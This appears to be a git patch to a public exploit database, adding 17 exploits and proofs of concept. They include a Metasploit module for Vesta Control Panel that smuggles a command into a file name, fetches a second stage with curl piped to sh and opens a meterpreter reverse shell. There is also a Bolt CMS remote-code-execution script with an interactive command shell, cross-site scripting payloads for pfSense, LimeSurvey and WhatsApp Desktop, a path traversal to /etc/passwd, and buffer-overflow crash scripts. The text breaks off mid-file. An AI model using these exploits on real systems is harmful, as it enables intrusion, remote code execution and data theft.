From 85bef6929fae93d7aed3049ad516fc29467afe3f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 7 Apr 2020 05:02:01 +0000 Subject: [PATCH] DB: 2020-04-07 17 changes to exploits/shellcodes Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) Frigate 3.36 - Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) Memu Play 7.1.3 - Insecure Folder Permissions Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) Microsoft NET USE win10 - Insufficient Authentication Logic LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit) WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting Bolt CMS 3.7.0 - Authenticated Remote Code Execution LimeSurvey 4.1.11 - 'File Manager' Path Traversal pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting --- exploits/freebsd/webapps/48300.txt | 39 ++++ exploits/multiple/webapps/48294.rb | 239 +++++++++++++++++++++ exploits/multiple/webapps/48295.txt | 42 ++++ exploits/php/webapps/48289.txt | 30 +++ exploits/php/webapps/48296.py | 167 +++++++++++++++ exploits/php/webapps/48297.txt | 18 ++ exploits/windows/dos/48284.py | 35 ++++ exploits/windows/dos/48285.py | 36 ++++ exploits/windows/dos/48286.py | 39 ++++ exploits/windows/dos/48287.py | 26 +++ exploits/windows/dos/48288.py | 23 ++ exploits/windows/dos/48290.py | 24 +++ exploits/windows/dos/48291.py | 22 ++ exploits/windows/dos/48292.txt | 22 ++ exploits/windows/local/48283.txt | 70 +++++++ exploits/windows/local/48293.py | 79 +++++++ exploits/windows/local/48299.txt | 313 ++++++++++++++++++++++++++++ files_exploits.csv | 17 ++ 18 files changed, 1241 insertions(+) create mode 100644 exploits/freebsd/webapps/48300.txt create mode 100755 exploits/multiple/webapps/48294.rb create mode 100644 exploits/multiple/webapps/48295.txt create mode 100644 exploits/php/webapps/48289.txt create mode 100755 exploits/php/webapps/48296.py create mode 100644 exploits/php/webapps/48297.txt create mode 100755 exploits/windows/dos/48284.py create mode 100755 exploits/windows/dos/48285.py create mode 100755 exploits/windows/dos/48286.py create mode 100755 exploits/windows/dos/48287.py create mode 100755 exploits/windows/dos/48288.py create mode 100755 exploits/windows/dos/48290.py create mode 100755 exploits/windows/dos/48291.py create mode 100644 exploits/windows/dos/48292.txt create mode 100644 exploits/windows/local/48283.txt create mode 100755 exploits/windows/local/48293.py create mode 100644 exploits/windows/local/48299.txt diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt new file mode 100644 index 000000000..f485c9955 --- /dev/null +++ b/exploits/freebsd/webapps/48300.txt @@ -0,0 +1,39 @@ +# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.pfsense.org +# Version: PfSense 2.4.4-P3 +# Tested on: FreeBSD 11.2-RELEASE-p10 +# CVE : CVE-2020-11457 + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. +# Vulnerable Parameter : descr + + +# POC +# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. +# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is +# the id of the user containing the payload. + + +POST /system_usermanager.php?act=new HTTP/1.1 +Host: TARGET +Connection: close +Content-Length: 410 +Cache-Control: max-age=0 +Origin: https://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Sec-Fetch-Dest: document +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Referer: https://TARGET/system_usermanager.php?act=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d + +__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save \ No newline at end of file diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb new file mode 100755 index 000000000..53c997d1a --- /dev/null +++ b/exploits/multiple/webapps/48294.rb @@ -0,0 +1,239 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in v-list-user-backups bash script file. + Low privileged authenticated users can execute arbitrary commands under the context of the root user. + + An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. + During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As + result of that backup process, when an attacker try to list existing backups injected payload will be + executed. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], + ['CVE', '2020-10808'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8083, + 'WfsDelay' => 300, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2020", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(8083), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + deregister_options('FTPUSER', 'FTPPASS') + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def login + # + # This is very simple login process. Nothing important. + # We will be using cookie and csrf_token across the module so that we are global variable. + # + print_status('Retrieving cookie and csrf token values') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + }) + + if res && res.code == 200 && !res.get_cookies.empty? + @cookie = res.get_cookies + @csrf_token = res.body.scan(//).flatten[0] || '' + if @csrf_token.empty? + fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + print_good('Cookie and CSRF token values successfully retrieved') + + print_status('Authenticating to HTTP Service with given credentials') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + 'cookie' => @cookie, + 'vars_post' => { + 'token' => @csrf_token, + 'user' => username, + 'password' => password + } + }) + + if res && res.code == 302 && !res.get_cookies.empty? + print_good('Successfully authenticated to the HTTP Service') + @cookie = res.get_cookies + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + end + + def is_scheduled_backup_running + res = trigger_scheduled_backup + # + # MORE explaination. + # + if res && res.code == 302 + res = trigger_payload + if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') + return true + else + print_good('It seems scheduled backup is done ..! Triggerring payload <3') + return false + end + else + fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') + end + return false + end + + def trigger_payload + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), + }) + if res && res.code == 200 + res + else + fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') + end + end + + def trigger_scheduled_backup + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), + }) + if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// + res + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + end + + def payload_implant + # + # Our payload will be placed as a file name on FTP service. + # Payload lenght can't be more then 255 and SPACE can't be used because of the + # bug in the backend software. Due to these limitations, I used web delivery method. + # + # When the initial payload executed. It will execute very short perl command, which is going to fetch + # actual python meterpreter first stager and execute it. + # + final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Yet another datastore variable overriding. + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + port_restore = datastore['RPORT'] + datastore['RPORT'] = 21 + datastore['FTPUSER'] = username + datastore['FTPPASS'] = password + + # + # Connecting to the FTP service with same creds as web ui. + # Implanting the very first stage of payload as a empty file. + # + if (not connect_login) + fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') + end + print_good('Successfully authenticated to the FTP service') + + res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") + if res.nil? + fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") + end + print_good('Successfully uploaded the payload as a file name') + disconnect + + # Revert datastore variables. + datastore['RPORT'] = port_restore + datastore['SSL'] = true if ssl_restore + end + + def exploit + start_http_server + payload_implant + login + trigger_scheduled_backup + print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') + while is_scheduled_backup_running == true + print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') + Rex.sleep(30) + end + stop_service + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! Sending 2nd stage of the payload') + second_stage = "python -c \"#{payload.encoded}\"" + send_response(cli, second_stage, {'Content-Type'=>'text/html'}) + end + + def start_http_server + # + # HttpClient and HttpServer use same SSL variable :( + # We don't need a SSL for payload delivery. + # + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("Second payload download URI is #{get_uri}") + # We need that global variable since get_uri keep using SSL from datastore + # We have to get the URI before restoring the SSL. + @second_stage_url = get_uri + datastore['SSL'] = true if ssl_restore + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt new file mode 100644 index 000000000..7e0e139ae --- /dev/null +++ b/exploits/multiple/webapps/48295.txt @@ -0,0 +1,42 @@ +# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting +# Date: 2020-01-21 +# Exploit Author: Gal Weizman +# Vendor Homepage: https://www.whatsapp.com +# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe +# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg +# Version: 0.3.9308 +# Tested On: Mac OS, Windows, iPhone +# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 + +// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) +// step 2: open devtools and search in all files "t=e.id" +// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found +// step 4: paste "https://example.com" in the text box and hit "Enter" +// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" + +var payload = `(async function() { + alert(navigator.userAgent); + (async function() { + // read "file:///C:/windows/system32/drivers/etc/hosts" content + const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); + const t = await r.text(); + alert(t); + }()) +}())`; + +payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; + +e.__x_matchedText = payload; + +e.__x_body = ` + Innocent text + + ${payload} + + More Innocent text +`; + +// step 6: press F8 in order for the execution to continue +// result: a message should be sent to the victim that once is clicked will execute the payload above + +// further information: https://github.com/weizman/CVE-2019-18426 \ No newline at end of file diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt new file mode 100644 index 000000000..213de9367 --- /dev/null +++ b/exploits/php/webapps/48289.txt @@ -0,0 +1,30 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11456 + +# Vulnerability Details +Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. +Vulnerable Parameter : "title" + + +# POC +POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 +Host: TARGET +Content-Length: 374 +Cache-Control: max-age=0 +Origin: http://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D +Connection: close + +YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0= \ No newline at end of file diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py new file mode 100755 index 000000000..9b3401a53 --- /dev/null +++ b/exploits/php/webapps/48296.py @@ -0,0 +1,167 @@ +# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution +# Date: 2020-04-05 +# Exploit Author: r3m0t3nu11 +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.x +# Tested on: Linux +# CVE : not-yet-0day + +# last version + +# p0c + + +#!/usr/bin/python + +import requests +import sys +import warnings +import re +import os +from bs4 import BeautifulSoup +from colorama import init +from termcolor import colored + +init() + +print(colored(''' + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ + ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ +▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ +▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ +▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ +▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ +▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ +▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ +▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ + ▀▀▀▀▀▀▀▀▀▀▀ + +Pre Auth rce with low credintanl +By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) + + + +if len(sys.argv) != 4: + print((len(sys.argv))) + print((colored("[~] Usage : ./bolt.py url username password","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + + + +request = requests.session() +print((colored("[+] Retrieving CSRF token to submit the login +form","green"))) +page = request.get(url+"/bolt/login") +html_content = page.text +soup = BeautifulSoup(html_content, 'html.parser') +token = soup.findAll('input')[2].get("value") + +login_info = { + "user_login[username]": username, + "user_login[password]": password, + "user_login[login]": "", + "user_login[_token]": token + } + +login_request = request.post(url+"/bolt/login", login_info) +print((colored("[+] Login token is : {0}","green")).format(token)) + + + +aaa = request.get(url+"/bolt/profile") +soup0 = BeautifulSoup(aaa.content, 'html.parser') +token0 = soup0.findAll('input')[6].get("value") +data_profile = { +"user_profile[password][first]":"password", +"user_profile[password][second]":"password", +"user_profile[email]":"a@a.com", +"user_profile[displayname]":"", +"user_profile[save]":"", +"user_profile[_token]":token0 + +} +profile = request.post(url+'/bolt/profile',data_profile) + + + + +cache_csrf = request.get(url+"/bolt/overview/showcases") + +soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') +csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") + + +asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") +soup2 = BeautifulSoup(asyncc.text, 'html.parser') +tables = soup2.find_all('span', class_ = 'entry disabled') + + +print((colored("[+] SESSION INJECTION ","green"))) +for all_tables in tables: + +f= open("session.txt","a+") +f.write(all_tables.text+"\n") +f.close() +num_lines = sum(1 for line in open('session.txt')) + +renamePostData = { +"namespace": "root", +"parent": "/app/cache/.sessions", +"oldname": all_tables.text, +"newname": "../../../public/files/test{}.php".format(num_lines), +"token": csrf + } +rename = request.post(url+"/async/folder/rename", renamePostData) + + + + +try: +url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) + +rev = requests.get(url1).text +r1 = re.findall('php',rev) + +r2 = r1[0] +if r2 == "php" : +fileINJ = "test{}".format(num_lines) + +print((colored("[+] FOUND : "+fileINJ,"green"))) + +except IndexError: +print((colored("[-] Not found.","red"))) + +new_name = 0 +while new_name != 'quit': +inputs = input(colored("Enter OS command , for exit 'quit' : +","green","on_red")) +if inputs == "quit" : +exit() +else: +a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) +aa = a.text +r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + + +print((r11)[0]) + + + + +Greetz to : all my friends \ No newline at end of file diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt new file mode 100644 index 000000000..bda2a8a0f --- /dev/null +++ b/exploits/php/webapps/48297.txt @@ -0,0 +1,18 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11455 + +# Vulnerability Details +# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey +# that allows an attacker to download arbitrary files. The file manager functionality will also +# delete the file after it is downloaded (if the web service account has permissions to do so), +# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. +Vulnerable Parameter : "path" + + +# POC +https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/windows/dos/48284.py b/exploits/windows/dos/48284.py new file mode 100755 index 000000000..a91229f95 --- /dev/null +++ b/exploits/windows/dos/48284.py @@ -0,0 +1,35 @@ +# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) +# Discovery by: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe +# Tested Version: 4.2.2.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App + +# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers. + + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Key' +# 6.click 'ok' +# 5.Magic happen :) + + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48285.py b/exploits/windows/dos/48285.py new file mode 100755 index 000000000..12369a016 --- /dev/null +++ b/exploits/windows/dos/48285.py @@ -0,0 +1,36 @@ +# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) +# Exploit Author: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: https://www.spotauditor.com/ +# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe +# Tested Version: 5.3.4 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App + +# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, +# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook +# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 +# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms. + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run SpotAuditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Name' +# 6.click 'ok' +# 5.Magic happen :) + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48286.py b/exploits/windows/dos/48286.py new file mode 100755 index 000000000..ce265c73f --- /dev/null +++ b/exploits/windows/dos/48286.py @@ -0,0 +1,39 @@ +# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) +# Discovery by: 0xMoHassan +# Date: 2020-04-04 +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Tested Version: 3.2.0.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows XP - SP3 + +# About App +# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, +# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that +# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing +# software significantly reduces the total cost of network management in enterprise environments by enabling +# IT personnel and systems administrators gather a wide range of information from all the computers in the network without +# installing server-side applications on these computers and create a report of potential problems that were found. + + +# PoC +# 1.Run the python script, it will create a new file "POC.txt" +# 3.Run Nsauditor and click on "Register -> Enter Registration Code" +# 2.Paste the content of POC.txt into the Field: 'Name' +# 6.click 'ok' +# 5.Magic happen :) + + + +#!/usr/bin/env python +buff = "\x41" *500 +buff += "\x41" * 500 + +try: + f=open("POC.txt","w") + print "[+] Creating %s bytes payload.." %len(buff) + f.write(buff) + f.close() + print "[+] POC created!" +except: + print "POC cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/48287.py b/exploits/windows/dos/48287.py new file mode 100755 index 000000000..01d5a7147 --- /dev/null +++ b/exploits/windows/dos/48287.py @@ -0,0 +1,26 @@ +# Exploit Title: Frigate 3.36 - Denial of Service (PoC) +# Date: 2020-04-05 +# Exploit Author: inter +# Vendor Homepage: http://www.Frigate3.com/ +# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe +# Vulnerable Software: Firgate +# Version: 3.36 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: crash.py +# 2.- Copy content to clipboard +# 3.- Open "Frigate3.exe" +# 4.- Go to "Disk" > Find Computer +# 5.- Paste ClipBoard into the "Computer Name:" field +# 6.- Click on OK +# 7.- Crashed + +#Python "crash.py" Code: + +buffer = "\x41" * 2000 +f = open ("Frigate.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48288.py b/exploits/windows/dos/48288.py new file mode 100755 index 000000000..e0a122ff7 --- /dev/null +++ b/exploits/windows/dos/48288.py @@ -0,0 +1,23 @@ +# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.uvnc.com/ +# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 +# Tested Version: 1.2.4.0 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py +#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard +#3.- Open UltraVNC Launcher +#4.- Select "Properties" +#5.- In "Repeater host" Paste Clipboard +#6.- Click on "OK" +#7.- Crashed + +cod = "\x41" * 300 + +f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48290.py b/exploits/windows/dos/48290.py new file mode 100755 index 000000000..eee1b4ddc --- /dev/null +++ b/exploits/windows/dos/48290.py @@ -0,0 +1,24 @@ +# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.uvnc.com/ +# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 +# Tested Version: 1.2.4.0 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +#Steps to produce the crash: +#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py +#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard +#3.- Open UltraVNC Launcher +#4.- Select "Properties" +#5.- In "Password" Paste Clipboard +#6.- Click on "OK" +#7.- Click on "Propieties" +#8.- Crashed + +cod = "\x41" * 300 + +f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/48291.py b/exploits/windows/dos/48291.py new file mode 100755 index 000000000..f926016a6 --- /dev/null +++ b/exploits/windows/dos/48291.py @@ -0,0 +1,22 @@ +# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.uvnc.com/ +# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 +# Tested Version: 1.2.4.0 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py +#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard +#3.- Open UltraVNC Viewer +#4.- In "VNC Server" Paste Clipboard +#5.- Click on "Connect" +#6.- Crashed + +cod = "\x41" * 256 + +f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 